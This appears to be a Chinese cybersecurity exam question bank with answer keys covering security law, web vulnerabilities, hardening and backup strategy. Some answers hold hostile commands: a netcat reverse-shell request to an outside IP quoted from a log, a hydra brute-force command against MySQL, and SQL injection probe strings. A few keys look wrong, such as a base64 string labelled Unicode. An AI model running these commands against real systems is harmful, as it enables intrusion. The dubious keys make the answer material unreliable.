    B、以SYSDBA身份使用AUDIT ALL ON SYS.AUD$ BY ACCESS,语句对audit trail审计
    C、Oracle不支持对audit trail的审计
    D、在设置audit trail审计前,要保证已经打开Oracle的审计机制

    对于默认安装的JBoss4.3中间件,可能存在的安全问题?( )【AB】
    A. 远程命令执行漏洞
    B. 远程部署war包
    C. SQL注入漏洞
    D. xss跨站漏洞

    下列哪些中间件默认页面存在JAVA反序列化漏洞?( )【ACD】
    A. JBoss
    B.IIS7
    C. weblogic
    D.websphere

    常见网站敏感信息泄漏的文件类型有哪些?( )【AB】
    A..bak
    B.
    .ini
    C..js
    D.
    .html

    典型数据库安全攻击方式包括( )?【ABCD】
    A.SQL注入
    B.网络窃听
    C.密码猜解
    D.未授权访问
    E. 包含漏洞
    F. 文件上传漏洞

    1.为了加强防病毒网关对病毒文件或高风险文件的拦截,需要对含有以下后缀的文件进行直接删除(多选):( ) 【ABCDG】
    A、.exe
    B、
    .vbs
    C、.bat
    D、
    .js
    E、.bmp
    F、
    .txt
    G、*.com

    2.要判断远程服务器是否开放某些TCP端口,可以使用以下哪些工具进行探测扫描? ( )【ACDEF】
    A.Telnet
    B.Ping
    C.Nmap
    D. ZenMap
    E.Nessus
    F. SQLMap

    3.思科交换机上的ACL有以下特点:( ) 【AB】
    A.需要把ACL绑定到端口
    B.必须绑定到端口的in或out方向
    C.可识别UDP会话状态
    D. 可判断流量是否为HTTP协议

    4.以下哪些协议没有保护用户密码等机密信息在网络上的传输安全:( )【ABC】
    A.SMTP
    B.POP3
    C.FTP
    D. SSH
    E. HTTPS

    1 建设关键信息基础设施应当确保其具有支持业务稳定、持续运行的性能,并保证安全技术措施________。 ABD
    A.同步规划
    B.同步建设
    C.同步投运
    D.同步使用

    2 电力二次系统安全防护策略包括________。 ABCD
    A.安全分区
    B.网络专用
    C.横向隔离
    D.纵向认证

    3 公司秘密包括________两类。 AC
    A.商业秘密
    B.个人秘密
    C.工作秘密
    D.部门文件

    4 国家采取措施,来源于中华人民共和国境内外的网络安全风险和威胁,保护关键信息基础设施免受攻击、侵入、干扰和破坏。 ABC
    A.监测
    B.防御
    C.处置
    D.隔离

    5 信息安全“三个不发生”是指____。 ABC
    A.确保不发生大面积信息系统故障停运事故
    B.确保不发生恶性信息泄密事故
    C.确保不发生信息外网网站被恶意篡改事故
    D.确保不发生信息内网非法外联事故

    6 下列情况违反“五禁止”的有________。 ABCD
    A.在信息内网计算机上存储国家秘密信息
    B.在信息外网计算机上存储企业秘密信息
    C.在信息内网和信息外网计算机上交叉使用普通优盘
    D.在信息内网和信息外网计算机上交叉使用普通扫描仪

    7 网络运营者收集、使用个人信息,应当遵循______________的原则,公开收集、使用规则,明示收集、使用信息的目的、方式和范围,并经被收集者同意。 BCD
    A.真实 B.合法 C.正当 D.必要

    8 下列关于网络信息安全说法正确的有_______。 AC
    A.网络运营者应当对其收集的用户信息严格保密
    B.网络运营者应妥善管理用户信息,无需建立用户信息保护制度
    C.网络运营者不得泄露、篡改、毁损其收集的个人信息
    D.在经过处理无法识别特定个人且不能复原的情况下,未经被收集者同意,网络运营者不得向他人提供个人信息。

    9 下列关于内外网邮件系统说法正确的有________。ABCD
    A.严禁使用未进行内容审计的信息内外网邮件系统
    B.严禁用户使用默认口令作为邮箱密码
    C.严禁内外网邮件系统开启自动转发功能
    D.严禁用户使用互联网邮箱处理公司办公业务

    10 网络运营者,是指________。 BCD
    A.网络运维者 B.网络所有者 C.网络服务提供者 D.网络管理者

    11 下列关于网络安全法的说法错误的有________。 AB
    A.国家规定关键信息基础设施以外的网络运营者必须参与关键信息基础设施保护体系。
    B.关键信息基础设施的运营者可自行采购网络产品和服务不通过安全审查。
    C.网络运营者应当加强对其用户发布的信息的管理,发现法律、行政法规禁止发布或者传输的信息的,应当立即向上级汇报。
    D.国家网信部门应当统筹协调有关部门加强网络安全信息收集、分析和通报工作,按照规定统一发布网络安全监测预警信息。

    12 某单位信息内网的一台计算机上一份重要文件泄密,但从该计算机上无法获得泄密细节和线索,可能的原因是________。 ABCD
    A.该计算机未开启审计功能 B.该计算机审计日志未安排专人进行维护
    C.该计算机感染了木马 D.该计算机存在系统漏洞

    13 网络安全事件发生的风险增大时,省级以上人民政府有关部门应当按照规定的权限和程序,并根据网络安全风险的特点和可能造成的危害,采取下列措施_______。ACD
    A.要求有关部门、机构和人员及时收集、报告有关信息
    B.加强对网络安全风险的监测
    C.组织有关部门、机构和专业人员,对网络安全风险信息进行分析评估
    D.向社会发布网络安全风险预警,发布避免、减轻危害的措施

    14 因网络安全事件,发生突发事件或者生产安全事故的,应当依照_______等有关法律、行政法规的规定处置。 BC
    A.《中华人民共和国网络安全法》
    B.《中华人民共和国突发事件应对法》
    C.《中华人民共和国安全生产法》
    D.《中华人民共和国应急法》

    15 网络安全事件应急预案应当按照事件发生后的________、________等因素对网络安全事件进行分级。 AB
    A.危害程度 B.影响范围 C.事件等级 D.关注程度

    1. 信息安全方针和策略的流程是()。【 ABC】
      A.安全方针和策略 B.资金投入管理 C.信息安全规划 D.以上都不是
    2. 从系统整体看,下述那些问题属于系统安全漏洞。 【ABC】
      A、产品缺少安全功能 B、产品有Bugs C、缺少足够的安全知识 D、人为错误
    3. 应对操作系统安全漏洞的基本方法是什么?。【 AB】
      A、对默认安装进行必要的调整 B、给所有用户设置严格的口令
      C、及时安装最新的安全补丁 D、更换到另一种操作系统
    4. 计算机安全事故包括以下几个方面()。【ABCD】
      A.因自然因素,导致发生危害计算机信息系统安全的事件
      B.因自然因素,进入可能导致危害计算机信息系统安全的非正常运行状态的事件
      C.因人为原因,导致发生危害计算机信息系统安全的事件
      D.因人为原因,进入可能导致危害计算机信息系统安全的非正常运行状态的 事件
    5. 病毒防护必须具备哪些准则。【ABCD】
      A、拒绝访问能力 B、病毒检测能力
      C、控制病毒传播的能力 D、清除能力、恢复能力、替代操作
    6. 防火墙管理员应承担下面哪些责任:()。【 ABCD】
      A.规划和部署,策略制定,规则配置与测试 B.防火墙状态监控
      C.防火墙日志审计分析 D.安全事件的响应处理
    7. 应建立计算机信息网络安全管理组织的联网单位有:()。【ABC】
      A、各互联网接入服务单位 B、信息服务单位
      C、专线接入互联网的单位 D、所有接入互联网的单位
    8. 实行计算机安全事故和计算机案件报告制度是()。【ABCD】
      A、是计算机信息系统安全监察和安全防范、安全管理工作中的重要组成部分
      B、是贯彻落实有关安全法规,强化计算机信息系统安全管理的规范性要求
      C、是公安机关了解掌握计算机信息系统应用单位内部安全管理情况的手段
      D、是国家法规的要求,也是所有计算机使用单位和用户,以及公民应有的职责和义务

    81.( )造成了我国信息安全技术实力较弱。
    A.缺乏自主技术体系d B.对新兴技术信息安全反应过慢d C.对网络犯罪技术缺乏有效应对d D.没有掌握核心技术d E.对新兴技术信息盲目跟风d
    82.我国互联网发展有哪些特征?( )
    A.互联网经济快速发展dB.互联网的社会影响逐步加深dC.互联网规模持续扩大dD.互联网应用更新换代不断加快dE.以上都是正确的d
    83.传统媒体的问题包括( )。
    A.失去新闻的时效性dB.失去舆论话语权dC.不符合用户导向性dD.新闻与传播的脱节dE.传统新闻业诸多改革壁垒d
    84.用好管好互联网的四个理念包括( )。
    A.依法管网理念d B.以人管网理念d C.技术管网理念d D.以德管网理念 E.综合管网理念d
    85.自媒体的四个属性包括( )。
    A.自然dB.自有dC.自我dD.自理E.自律d
    86.微博博主的主要类型包括( )。
    A.自我表达型dB.社交活跃型dC.官方阐述型D.话题讨论型dE.潜水偷窥型d
    87.医患关系中医患纠纷的原因主要包括( )。
    A.政府方面dB.媒体方面dC.患者方面dD.医院方面dE.以上都是d
    88.现在,我们处在IT变革的时代,云计算带来了许多新的变化,包括()。
    A.数据处理模式从集中走向分散B.数据处理模式从分散走向集中dC.用户界面更加人性化,可管理性和安全性大大提高dD.网络无处不在,连接无处不在dE.通讯和信息处理方式将全面网络化,并实现前所未有的系统扩展能力和跨平台能力d
    89.恶意代码是一些恶意的软件,是广义的病毒,它的特征包括()。
    A.目的是恶意的dB.目的并非恶意C.本身也是程序dD.通过执行发生作用dE.本身并非程序
    90.在整个账户安全里,最重要的是实现强密码保护,实现强密码保护的措施包括()。
    A.设置密码时,避免包含个人信息dB.为防止忘记密码,将密码记录在电脑中C.不要将密码记录在电脑中d
    D.使用不同的密码dE.设置密码时,混合使用大小写、数字符等d

    1. 在局域网中计算机病毒的防范策略有______。(ADE)
      A.仅保护工作站 B.保护通信系统 C.保护打印机
      D.仅保护服务器 E.完全保护工作站和服务器
    2. 在互联网上的计算机病毒呈现出的特点是______。(ABCD)
      A. 与互联网更加紧密地结合,利用一切可以利用的方式进行传播
      B. 具有多种特征,破坏性大大增强
      C. 扩散性极强,也更注重隐蔽性和欺骗性
      D. 针对系统漏洞进行传播和破坏
    3. 一个安全的网络系统具有的特点是______。(ABCE)
      A. 保持各种数据的机密
      B. 保持所有信息、数据及系统中各种程序的完整性和准确性
      C. 保证合法访问者的访问和接受正常的服务
      D. 保证网络在任何时刻都有很高的传输速度
      E. 保证各方面的工作符合法律、规则、许可证、合同等标准
    4. 任何信息安全系统中都存在脆弱点,它可以存在于______。(ABCDE)
      A.使用过程中 B.网络中 C.管理过程中
      D.计算机系统中 E.计算机操作系统中
    5. ______是建立有效的计算机病毒防御体系所需要的技术措施。(ABCDE)
      A.杀毒软件 B.补丁管理系统 C.防火墙 D.网络入侵检测 E.漏洞扫描
    6. 信息系统安全保护法律规范的作用主要有______。(ABCDE)
      A.教育作用 B.指引作用 C.评价作用 D.预测作用 E.强制作用
    7. 根据采用的技术,入侵检测系统有以下分类:______。(BC)
      A.正常检测 B.异常检测 C.特征检测 D.固定检测 E.重点检测
    8. 在安全评估过程中,安全威胁的来源包括______。(ABCDE)
      A.外部黑客 B.内部人员 C.信息技术本身 D.物理环境 E.自然界
    9. 安全评估过程中,经常采用的评估方法包括______。(ABCDE)
      A.调查问卷 B.人员访谈 C.工具检测 D.手工审核 E.渗透性测试
    10. 根据ISO定义,信息安全的保护对象是信息资产,典型的信息资产包括______。(BC)
      A.硬件 B.软件 C.人员 D.数据 E.环境
    11. 根据ISO定义,信息安全的目标就是保证信息资产的三个基本安全属性,包括__。(BCD)
      A.不可否认性 B.保密性 C.完整性 D.可用性 E.可靠性
    12. 治安管理处罚法规定,______行为,处5日以下拘留;情节较重的,处5日以上10日以下拘留。(ABCD)
      A. 违反国家规定,侵入计算机信息系统,造成危害的
      B. 违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行的
      C. 违反国家规定,对计算机信息系统中存储、处理、传输的数据和应用程序进行删除、修改、增加的
      D. 故意制作、传播计算机病毒等破坏性程序,影响计算机信息系统正常运行的
    13. 网络蠕虫病毒越来越多地借助网络作为传播途径,包括______。(ABCDE)
      A.互联网浏览 B.文件下载 C.电子邮件 D.实时聊天工具 E.局域网文件共享
    14. 在信息安全管理中进行安全教育与培训,应当区分培训对象的层次和培训内容,主要包括__(ABE)
      A.高级管理层 B.关键技术岗位人员 C.第三方人员 D.外部人员 E.普通计算机用户
    15. 网络入侵检测系统,既可以对外部黑客的攻击行为进行检测,也可以发现内部攻击者的操作行为,通常部署在______。(BC)
      A. 关键服务器主机 B. 网络交换机的监听端口 C. 内网和外网的边界 D. 桌面系统 E. 以上都正确

    1.有一类加密算法,使用的加密密钥和解密密钥可以不同,这种加密算法称为:( )。 【非对称加密算法】
    2.0 day漏洞指的是什么类型的漏洞: ( ) 【厂家尚未公布修复补丁的漏洞】
    3.网络攻击行为中,“撞库”攻击指的是:( ) 【使用泄漏的或已知的密码进行账号暴力猜测】
    4.你正在https://soc.csair.com网页上输入用户名密码,如何知道这个网页不是假冒的南航网站?( ) 【查看数字证书信任关系】
    5.入侵检测系统(IDS)需要侦听一个交换机网口上的进出流量,IDS接到交换机上,并设置交换机。这个设置操作称为:( ) 【端口镜像/span/mirror】
    6.为了防止硬盘的物理损坏导致数据丢失,使用磁盘冗余技术RAID5。3块2G的硬盘构成RAID5后,可用磁盘空间为多少?( ) 【4G】
    7.DNS区域传输漏洞导致的直接后果是什么? ( ) 【可以直接获取DNS域名全部记录信息】
    8.Google Hacking是如何实现攻击的? ( ) 【通过Google搜索网站敏感信息或找到网站特定漏洞】
    9.在Linux系统中,给普通用户授予部分管理员权限的方法叫( )。【sudo】
    10.说出一种曾经出现过上传文件绕过漏洞的Web应用:( )。【IIS/apache】
    11.Linux用户密码密文存在哪个文件中:( )。【/etc/shadow】
    12.在Windows中要看到进程启动的路径和参数,例如“C:\WINDOWS\System32\svchost.exe -k netsvcs”,需要使用的命令是:( )【wmic】
    13.默认配置情况下,在XP系统上,使用什么命令可以探测到目标网络对端的主机是Windows或Linux:( ) 【ping】
    14.Linux系统中,当用ls命令列出文件时,可以看到文件的权限设置:-rwxrwxrwx;分3组rwx ,其中中间的一组rwx是给什么用户的权限?( )。【文件所在组成员权限】
    15.要远程访问Windows服务器的共享文件夹,服务器需要开通的端口号是:( )。 【445】
    16.安全部门发现一个网站存在文件上传漏洞,可是系统开发是外包的,不能修改代码,运维人员应采取什么措施? ( )【取消目录的web脚本执行权限】
    17.802.1x通常使用于准入认证,它是属于OSI模型的哪层协议?( ) 【二层/数据链路层】
    18.在APT攻击中,C&C指的是( ) 【控制中心】
    19.SQL server数据库中存储过程能执行系统命令( )。【xp_cmdshell】
    20.WINDOWS系统中,在cmd下运行命令可以查看到当前共享情况 ( )。【net share】
    21.31 国家保护____、和________依法使用网络的权利。 公民、法人和其他组织
    22.32 网络安全法中网络运行安全规定,国家实行_____网络安全等级保护_____制度。
    23.33 网络产品、服务应当符合__相关国家标准____的强制性要求。
    24.34 网络关键设备和网络安全专用产品应当按照相关国家标准的强制性要求,由____具备资格的机构____安全认证合格或者安全检测符合要求后,方可销售或者提供。
    25.35 网络运营者_____为用户办理网络接入、域名注册服务。
    26.36 国家实施___网络可信身份战略,支持研究开发安全、方便的电子身份认证技术,推动不同电子身份认证之间的互认。
    27.37 网络运营者应当为公安机关、国家安全机关依法维护国家安全和侦查犯罪的活动提供_技术支持_和__协助。
    28.
    29.38 关键信息基础设施的运营者采购网络产品和服务,应当按照规定与提供者签订_____安全保密协议
    __,明确安全和保密义务与责任。
    30.39 定期组织关键信息基础设施的运营者进行网络安全__应急演练__,提高应对网络安全事件的水平和协同配合能力。
    31.40 网络运营者应对其收集的用户信息严格保密,并建立健全____用户信息保护制度_____。

    1. 443端口是__https__服务使用的
    2. PING 是使用 TCP/IP 协议中的_ICMP__协议
    3. Linux远程SSH远程管理服务的端口是__22__, Windows远程终端管理服务的端口是___3389__.
    4. 括号里的字符串是_ UNICODE编码 (UWluZ1RlbmcgU2VjdXJpdHk=)

    1.OpenSSL心脏滴血漏洞出现在哪个工作环节,成功利用漏洞可能导致什么危害?【在检测SSL心跳信息时没有对信息进行严格检查,导致越界读取内存信息;成功利用漏洞可使黑客盗取用户账号】

    2.恶意或诈骗邮件的特点(请举例说明):【发件人邮箱是陌生人;附件有危险文件类型:*.vbs, *.exe, *.bat等;邮件内容诱导填写密码;有中奖信息之类利益诱惑内容】

    3.请说明跨站脚本(XSS)漏洞被利用的方法和可能导致的后果。(请说明存储和反射XSS漏洞被利用的场景,被攻击的对象,以严重程度。)
    【反射型XSS漏洞利用场景:用户可能被引诱点击带攻击代码的URL,导致用户把恶意代码发送到存在漏洞的服务器,而服务器会把恶意代码返回给用户浏览器并执行,导致用户的会话cookie被窃取,进而会话被劫持。存储型XSS漏洞利用场景:把带有恶意代码的URL发布在存在漏洞的网站上,引诱用户点击,服务器返回恶意代码,导致用户浏览器执行恶意代码,并在此网站执行用户未知的操作,可能导致连锁反应,形成蠕虫攻击】

    4.您作为企业信息安全工程师,请指导企业员工如何做好PC防病毒。(请从PC电脑技术和员工意识方面说明)
    【至少有以下关键点:自动安装补丁,启用防火墙,安装防病毒软件;不要点击陌生邮件附件和链接,不要运行陌生人发来的软件,避免使用U盘】

    5.Windows server操作系统默认安装后开放一些端口(禁用防火墙情况下),请您分析这些端口对用户开放存在哪些安全风险。
    【至少说明默认开放TCP445,3389,139端口;445,139端口容易被病毒攻击,共享可能被远程访问,远程安装软件;3389端口也曾经有漏洞,可能导致蓝屏,远程桌面容易被控制】

    41 国家网信部门应当统筹协调有关部门对关键信息基础设施的安全保护采取哪些措施?
    答:应采取如下措施:
    (1) 对关键信息基础设施的安全风险进行抽查检测,提出改进措施,必要时可以委托网络安全服务机构对网络存在的安全风险进行检测评估;
    (2) 定期组织关键信息基础设施的运营者进行网络安全应急演练,提高应对网络安全事件的水平和协同配合能力;
    (3) 促进有关部门、关键信息基础设施的运营者以及有关研究机构、网络安全 服务机构之间的网络安全信息共享;
    (4) 对网络安全事件的应急处置与网络功能的恢复等,提供技术支持和协助。

    42 网络安全事件发生的风险增大时,省级以上人民政府有关部门应当采取哪些措施?
    答:应采取下列措施:
    (1) 要求有关部门、机构和人员及时收集、报告有关信息,加强对网络安全风 险的监测;
    (2) 组织有关部门、机构和专业人员,对网络安全风险信息进行分析评估,预测事件发生的可能性、影响范围和危害程度;
    (3) 向社会发布网络安全风险预警,发布避免、减轻危害的措施。

    1、简述DOS和DDOS的区别:
    答:DOS意思是 Denial of service 的缩写,也就是网络产生的初期,用一台高配的设备去攻击一台低配的设备,造成被攻击的设备死机
    DDOS意思是 Distributed Denial of service 的缩写,随着技术的进步,IT设备的配置都在飞速增长,DOS的方式已经变的水土不服,那就产生了分布式的DOS,形象的说就是我一个人打不过你,那我可以多叫几个兄弟过来揍你,我可以雇佣很多打手,(也就是控制很多傀儡机)这样的攻击就是DDOS

    2、信息安全的基本属性主要表现在哪几个方面?
    答:(1)完整性(Integrity) (2)保密性(Confidentiality) (3)可用性(Availability) (4)不可否认性(Non-repudiation) (5)可控性(Controllability)

    3、PMI与PKI的区别主要体现在哪些方面?
    答:PKI证明用户是谁,并将用户的身份信息保存在用户的公钥证书中;
    PMI证明这个 用户有什么权限,什么属性,能干什么,并将用户的属性信息保存在授权证书中。

    4、请回答数据容灾的四个层次?
    第0级 本地备份、保存的冷备份
    第1级本地备份和异地保存的冷备份
    第2级热备份站点备份
    第3级活动互援备份

    5、请简述网站保护的方法?
    答:方法一:提高网站代码的质量,对客户端输入的内容做好检测和过滤。
    方法二:部署WEB防火墙(WAF产品),用设备来替代程序做好检测和过滤。

    6、什么是数字签名?并简述数字签名与数字签名验证有何区别?
    数字签名技术是将摘要信息用发送者的私钥加密,与原文一起传送给接收者。接收者只有用发送者的公钥才能解密被加密的摘要信息,然后用HASH函数对收到的原文产生一个摘要信息,与解密的摘要信息对比。如果相同,则说明收到的信息是完整的,在传输过程中没有被修改,否则说明信息被修改过,因此数字签名能够验证信息的完整性。
    数字签名是个加密的过程,数字签名验证是个解密的过程。

    1. 在WEB日志中发现这条访问请求记录,请说说您的看法( GET http://www.hack.cn/hack.php?cmd=nc 58.96.180.251 8080 -e /bin/bash 200 )
      答:攻击者使用netcat进行反弹链接,使服务器和IP地址为58.96.180.251的监听主机的8080端口建立连接,获得CMDSHELL。HTTP状态码为200,请求提交成功。
    2. 如何判断sql注入,有哪些方法, 为什么有的时候没有错误回显,用php举例
      答:问题一:可以采取手工检测和工具检测。
      (1)手工检测:打开一个页面,可用and 1=1和and 1=2手工检测。例如:
      例如:http://www.xudandan.com/news.php?id=4536 and 1=1(数值型)
      返回页面正常
      http://www.xudandan.com/news.php?id=4536 and 1=2
      返回页面异常(HTTP状态码为500)
      或者:http://www.xudandan.com/news.php?id=4536 and ‘1’=’1’(字符串型)
      http://www.xudandan.com/news.php?id=4536 and ‘1’=’2’
      与上述类似情况
      综上判断,该网站存在sql注入点。
      (2)工具有啊D,明小子旁注

    问题二:由于关闭了php的错误提示,linux中在安装php的目录下修改php.ini文件的相关配置信息。

    1. xss的发生场景?如果给你一个XSS漏洞,你还需要哪些条件可以构造一个蠕虫?
      答:攻击者发现XSS漏洞后注入恶意代码到网页,使用户加载网页并执行恶意代码,攻击成功后可得到用户的cookie信息、未加密的敏感信息等。
    2. CSRF漏洞的本质是什么?防御CSRF都有哪些方法?
      答:CSRF漏洞的本质是攻击者可以盗用受害者的身份,以受害者的名义发送恶意请求,对服务器来说这个请求是合法的。所以它又被称为“冒充用户之手”。
      CSRF攻击的思想是:受害者A登录某个受信网站T,在本地生成一个cookie,并在不登出网站T的前提下访问危险网站D,A访问D时执行攻击者构造的恶意代码,浏览器就会自动带着A产生的cookie信息请求访问T,T认为请求为A发起的,D就达到了伪造用户身份操作的目的。
      防御CSRF的方法:
      (1)token验证;
      (2)验证HTTP头的Referer
    3. webshell检测,有哪些方法?
      答:静态特征检测:根据恶意字符串特征库,在脚本文件中检查是否匹配,这种方法容易误报和漏报。
      动态特征检测:把webshell特有的HTTP请求/响应做成特征库,加到IDS里面去检测所有的HTTP请求,但是由于未必能抓取全部的动态特征,必定会导致漏报。
    4. 简述Linux系统安全加固需要做哪些方面
      答:(1)安装最新的Linux发行版本,及时升级系统软件和内核;
      (2)遵循最小服务原则,关闭不必要的端口和服务;
      (3)删除或禁用可能无用的账户和用户组,限制root的远程访问;
      (4)设置密码策略满足复杂度要求;
      (5)检查重要目录和文件权限,例如去掉不必要的s权限;
      (6)根据具体情况设置iptables防火墙规则;
      (7)启用安全审计,并对入侵相关重要日志进行硬拷贝;
    5. 简述你需要针对一个目标渗透测试的步骤
      答:(1)信息收集。例如:Google Hacking,whois查询,或者使用社会工程学等;
      (2)漏洞扫描。
      (3)漏洞分析。综合收集的信息,例如漏洞扫描的结果,服务器的配置,防火墙的情况等,根据这些信息分析开发或者得到公开的渗透代码;
      (4)利用找到的目标系统的漏洞进行渗透入侵,从而得到管理权限并提权 ;
      (5)收集需要的、有用的信息;
      (6)清除日志;
      (7)生成渗透报告。

    8.请写一条正则表达式,用于匹配ip地址
    答:((25[0-5]|2[0-4]/d|[01]?/d?/d)/.){3}(25[0-5]|2[0-4]/d|[01]?/d?/d)

    9.请用sed命令,删除一个文件中所有的换行符

    10.请写出hydra暴力破解mysql的命令,字典名为mysql_pass.txt
    答:hydra –P mysql_pass.txt –Vv –e n –o save.log 192.168.1.1 mysql

    1、简述计算机网络安全的定义
    网络安全是指计算机网络系统中的硬件、数据、程序等不会因为无意或恶意的原因而遭到破坏、篡改、泄露,防止非授权的使用或访问,系统能够保持服务的连续性,以及能够可靠的运行。
    2、什么是系统安全政策?
    安全政策。定义如何配置系统和网络,如何确保计算机机房和数据中心的安全以及如何进行身份鉴别和身份认证。同时,还确定如何进行访问控制、审计、报告和处理网络连接、加密和反病毒。还规定密码选择、账户到期、登录尝试失败处理等相关领域的程序和步骤。
    3、如果一个组织(或企业)的系统安全管理或网络管理人员,接到人事部门通知被解职,应该按照一般的安全策略执行那些安全措施?
    一个员工离开单位,他的网络应用账户应及时被禁用,他的计算机接入应立即禁止。如果配有便携笔记本式计算机或其它相关硬件设备,应及时进行收回。同时,在员工离职时,他们的身份验证工具如:身份卡、硬件令牌、智能卡等都同时收回。无论离职员工何时是否离开,一旦得知该员工即将离职,应对其所能够接触到的信息资源(尤其是敏感信息)进行备份处理。因为,一般情形下,员工的离职是一个充满情绪化的时期,尽管大多数人不会做出什么过分之举,但是保证安全总比出了问题再补救要有效。
    总之,无论是雇佣策略还是雇佣终止策略,都有需要考虑当地的政治和法律因素。在制定策略时,应避免出现如性别和种族歧视等违反法律或一般道德规范的条款。
    4、简述计算机网络攻击的主要特点。
    ①损失巨大。由于攻击和入侵的对象是网络上的计算机,所以一旦他们取得成功,就会使网络中成千上万台计算机处于瘫痪状态,从而给计算机用户造成巨大的经济损失。
    ②威胁社会和国家安全。一些计算机网络攻击者出于各种目的经常把政府要害部门和军事部门的计算机作为攻击目标,从而对社会和国家安全造成威胁。
    ③手段多样,手法隐蔽。计算机攻击的手段可以说五花八门。
    ④以软件攻击为主。几乎所有的网络入侵都是通过对软件的截取和攻击从而破坏整个计算机系统的。
    5、简述信息系统风险评估(风险分析)的主要内容。
    (又称风险分析)指将可能发生的安全事件所造成的损失进行定量化估计。如某类安全事件发生的概率、此类安全事件发生后对组织的数据造成的损失、恢复损失的数据需要增加的成本等。
    一般情况下,只有结束数据资产评估后,才能进行风险评估。只有认定具有价值或价值较高的数据才有必要进行风险评估。
    6、简述比较数据完全备份、增量备份和差异备份的特点和异同。
    ①完全备份:指将所有的文件和数据都备份到存储介质中。完全备份的实现技术很简单,但是需要花费大量的时间、存储空间和I/O带宽。它是最早的、最简单的备份类型。
    ②差异备份:对上一次完全备份之后才进行改变的数据和文件才需要进行复制存储。差异备份与完全备份相比,只需要记录部分数据,更为迅速。
    差异备份分为两个步骤:
    第一步,制作一个完全备份;
    第二步,对比检测当前数据与第一步骤中完全备份之间的差异。故差异备份必须在一次完全备份之后才可能开始,而且需要定时执行一次完全备份。这时的“定时”时间段取决于预先定义的备份策略。
    差异备份的恢复也分为两个步骤:
    第一步,加载最后一次的完全备份数据;
    第二步,使用差异备份的部分来更新变化过的文件。
    优点:差异备份在备份速度上比完全备份快。但是在备份中,必须保证系统能够计算从某一个时刻起改变过的文件。所以从空间上,差异备份只需要少量的存储空间就可以对文件或数据实现备份。
    ③增量备份:仅仅复制上一次全部备份后或上一次增量备份后才更新的数据。它与差异备份相类似,与差异备份相比,只需要备份上一次任何一种备份之后改变的文件。所以,其备份速度更快。但是,增量备份数据或文件的恢复方法稍微复杂,它需要在某个完全备份恢复的数据基础上,然后将该时间点以后所有的增量备份都更新到数据库中。其备份空间占据,比差异备份所需的空间更少。
    每种备份方式都各有优缺点,采用时,需要在备份策略中仔细评估每一种备份方式的时用性,最终选择备份方法。
    备份类型比较表:
    7、说明信息安全等级保护一般分为几个等级,并简述第三级信息安全保护的要求内容。
    信息系统根据其在国家安全、经济建设、社会生活中的重要程度,遭到破坏后对国家安全、社会秩序、公共利益以及公民、法人和其他组织的合法权益的危害程度等,由低到高划分为五级。
    具体的安全保护等级划分为以下五级:
    第一级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益造成损害,但不损害国家安全、社会秩序和公共安全。
    第二级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益产生严重损害,或者对社会秩序和公共利益造成损害,但不损害国家安全。
    第三级,信息系统受到破坏后,会对社会秩序和公共利益造成严重损害,或者对国家安全造成损害。
    第四级,信息系统受到破坏后,会对社会秩序和公共利益造成严重损害,或者对国家安全造成严重损害。
    第五级,信息系统受到破坏后,会对国家安全造成严重损害。
    8、物联网安全问题主要表现在那几个方面?
    目前,互联网在发展过程中遇到了两大体系性瓶颈,一个是地址不够,另一个是网络的安全问题。地址的问题通过IPv6能够解决,但是网络安全问题目前却没有好的解决之道。如果不能解决网络的可管、可控以及服务质量问题,将会在很大程度上影响物联网的进一步发展。根据物联网自身的特点,物联网除了面对移动通信网络的传统网络安全问题之外,还存在着一些与已有移动网络安全不同的特殊安全问题。这是由于物联网是由大量的机器构成,缺少人对设备的有效监控,并且数量庞大,设备集群等相关特点造成的,这些安全问题主要有以下几个方面。
    (1)物联网机器/感知节点的本地安全问题
    由于物联网的应用可以取代人来完成一些复杂、危险和机械的工作。所以物联网机器/感知节点多数部署在无人监控的场景中。那么攻击者就可以轻易地接触到这些设备,从而对他们造成破坏,甚至通过本地操作更换机器的软硬件。
    (2)感知网络的传输与信息安全问题
    感知节点通常情况下功能简单(如自动温度计)、携带能量少(使用电池),使得它们无法拥有复杂的安全保护能力,而感知网络多种多样,从温度测量到水文监控,从道路导航到自动控制,它们的数据传输和消息也没有特定的标准,所以没法提供统一的安全保护体系。
    (3)核心网络的传输与信息安全问题
    核心网络具有相对完整的安全保护能力,但是由于物联网中节点数量庞大,且以集群方式存在,因此会导致在数据传播时,由于大量机器的数据发送使网络拥塞,产生拒绝服务攻击。此外,现有通信网络的安全架构都是从人通信的角度设计的,并不适用于机器的通信。使用现有安全机制会割裂物联网机器间的逻辑关系。
    (4)物联网业务的安全问题
    由于物联网设备可能是先部署后连接网络,而物联网节点又无人看守,所以如何对物联网设备进行远程签约信息和业务信息配置就成了难题。另外,庞大且多样化的物联网平台必然需要一个强大而统一的安全管理平台,否则独立的平台会被各式各样的物联网应用所淹没,但如此一来,如何对物联网机器的日志等安
    全信息进行管理成为新的问题,并且可能割裂网络与业务平台之间的信任关系,导致新一轮安全问题的产生。

    1、分析信息安全的弱点和风险来源。
    (1)信息安全的木桶理论
    木桶理论:一个由许多长短不同的木板箍成的木桶,决定其容水量大小的并非是其中最长的那块木板或全部木板的平均值,而是取决于其中最短的那块木板。
    在信息安全中,认为信息安全的防护强度取决于“信息安全防线”中最为薄弱的环节。即最薄弱的环节存在最大的安全威胁,只有针对该环节进行改进才能提高信息安全的整体防护强度。
    (2)信息安全威胁的来源
    信息威胁的来源于四个方面:技术弱点、配置失误、政策漏洞、人员因素。 ①典型技术弱点。
    ACP/IP网络。由于其协议是一个开放的标准,主要用于互联网通信,开放的网络导致其不能保障信息传输的完整性和未经授权的存取等攻击手段做出适当的防护。
    操作系统漏洞。主流操作系统如UNIX、Windows、Linux等,由于各种原因导致其存在漏洞,必须由系统管理员经过安全配置、密切跟踪安全报告以及及时对操作系统进行更新和补丁更新操作才能保证其安全性。
    ②配置失误。由于操作者执行安全操作不到位或对安全技术理解不透引起的配置失误。如:系统账户存在易被猜测的用户名和密码。管理员技术不足以适应岗位或由于疏忽、惰性的原因,未对默认的高权限系统账户进行处理。
    设备未得到良好配置。如路由器、交换机或服务器使用带有漏洞的默认配置方式,或路由器的路由表未经过良好的维护,服务器的访问控制列表存在漏洞等。 ③政策漏洞。政策制定中未经过良好的协调和协商,存在不可能执行的政策,或政策本身违反法律条文或已有规章制度。
